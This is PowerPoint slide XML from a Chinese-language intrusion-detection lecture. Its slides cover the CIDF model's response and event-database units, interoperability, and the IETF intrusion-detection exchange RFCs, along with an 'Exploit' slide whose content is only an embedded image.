          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="827088" y="1844675"/>
            <a:ext cx="7705725" cy="4464050"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>响应单元则是对分析结果作出反应的功能单元，功能包括：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>告警和事件报告</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>终止进程，强制用户退出</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>切断网络连接，修改防火墙设置</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>灾难评估，自动恢复</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>查找定位攻击者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>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364BDD2D-A8E4-4007-A59E-8A67C176BA14}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>2.2.10 Exploit</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C52C6153-0A98-47F6-B44A-731ECD665FBE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1259632" y="-99392"/>
            <a:ext cx="6315075" cy="6696075"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E85C8B72-5EB7-43A4-A0FD-75A2B05DB255}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5076056" y="4866630"/>
            <a:ext cx="3456384" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>程序输出是什么？</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="167993914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6FEC21A0-5A5E-4229-AD88-BE696C0FC557}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>CIDF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>模型－事件数据库</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="208899" name="Rectangle 3" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{41210F5A-82AF-4611-9F5C-304BD5249FEF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>事件数据库是存放各种中间和最终数据的地方的统称，它可以是复杂的数据库，也可以是简单的文本文件。</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6FDCB584-E45C-4A2D-A9E9-E8C4672A1F5F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1143000" y="1066800"/>
            <a:ext cx="7772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Tx/>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>CIDF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>互操作性  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800">
                <a:latin typeface="Arial Unicode MS" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800">
                <a:latin typeface="Arial Unicode MS" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>配置互操作性：相互发现并交换数据</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800">
              <a:latin typeface="Arial Unicode MS" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800">
                <a:latin typeface="Arial Unicode MS" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>语法互操作性：正确识别交换的数据</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800">
              <a:latin typeface="Arial Unicode MS" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800">
                <a:latin typeface="Arial Unicode MS" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>语义互操作性：相互理解交换的数据</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18"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A6412287-C9E4-454B-867D-79D827E11D50}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="914400" y="1066800"/>
            <a:ext cx="487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Tx/>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>CIDF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>协同方式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Arial Unicode MS" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1">
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Arial Unicode MS" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1">
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Arial Unicode MS" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>           分析  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1">
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Arial Unicode MS" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>           互补   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1">
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Arial Unicode MS" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>           互纠</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1">
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Arial Unicode MS" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>            核实 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1">
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Arial Unicode MS" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>            调整</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1">
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Arial Unicode MS" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>            响应</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18"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id="{9CDC74CA-C6CD-497E-9052-3F0C41696D7B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="914400" y="1066800"/>
            <a:ext cx="4876800" cy="63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buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>入侵检测交换格式</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:latin typeface="Arial Unicode MS" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{248B39C1-E441-4B56-AF50-D507453BB90B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="611188" y="2241550"/>
            <a:ext cx="7924800" cy="4648200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>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defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="10000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>为了便于开发能够在各种平台和环境中运行的分布式入侵检测系统，需要标准来支持互操作性</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" kern="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2">
                  <a:lumMod val="10000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="10000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>IETF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="10000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>入侵检测工作组</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="10000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="10000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>IETF Intrusion Detection Working Group</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:schemeClr val="bg1"/>
              </a:buClr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="10000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>该小组的目的是定义数据格式和交换程序，以便与响应系统和可能需要与其进行交互的管理系统共享入侵检测感兴趣的信息</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" kern="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2">
                  <a:lumMod val="10000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:schemeClr val="bg1"/>
              </a:buClr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="10000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>已发布以下</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="10000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>RFC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="10000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buClr>
                <a:schemeClr val="bg1"/>
              </a:buClr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>入侵检测消息交换要求（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>RFC 4766</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buClr>
                <a:schemeClr val="bg1"/>
              </a:buClr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>入侵检测消息交换格式（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>RFC 4765</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buClr>
                <a:schemeClr val="bg1"/>
              </a:buClr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>入侵检测交换协议（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>RFC 4767</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="10000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" kern="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2">
                  <a:lumMod val="10000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" kern="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2">
                  <a:lumMod val="10000"/>
                </a:schemeClr>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3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3904B3E-F2AB-49AB-86C9-C82CFE67FADC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1258888" y="1841500"/>
            <a:ext cx="6934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入侵方法</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入侵检测概述</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入侵检测方法与基本原理</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入侵检测响应机制</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入侵检测标准化工作</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solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>   口令管理</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69C381A2-F43C-4F43-8A8F-F874834E0A7B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1176338" y="549275"/>
            <a:ext cx="9144000" cy="1282700"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>口令管理</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" altLang="zh-CN" sz="3200">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69635" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
